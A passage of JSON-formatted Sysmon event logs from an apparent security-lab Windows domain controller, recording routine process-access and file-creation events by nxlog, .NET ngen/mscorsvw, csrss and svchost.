(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:44.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7300,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:45.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:45.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7301,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:46.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:46.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7302,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:46.808\r\nProcessGuid: {E2A3D6B1-130F-5F25-0000-001053C20A00}\r\nProcessId: 1364\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\554-0\\PresentationFramework.dll\r\nCreationUtcTime: 2020-08-01 07:00:46.808","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:46.808","ProcessGuid":"{E2A3D6B1-130F-5F25-0000-001053C20A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\554-0\\PresentationFramework.dll","CreationUtcTime":"2020-08-01 07:00:46.808","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7303,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.105\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00106B800A00}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.105","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00106B800A00}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7304,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.105\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00106B800A00}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.105","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00106B800A00}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7305,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.105\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00106B800A00}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.105","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00106B800A00}","TargetProcessId":"4544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7306,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.183\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001060D00A00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:47.183","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001060D00A00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7307,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:47.183\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: 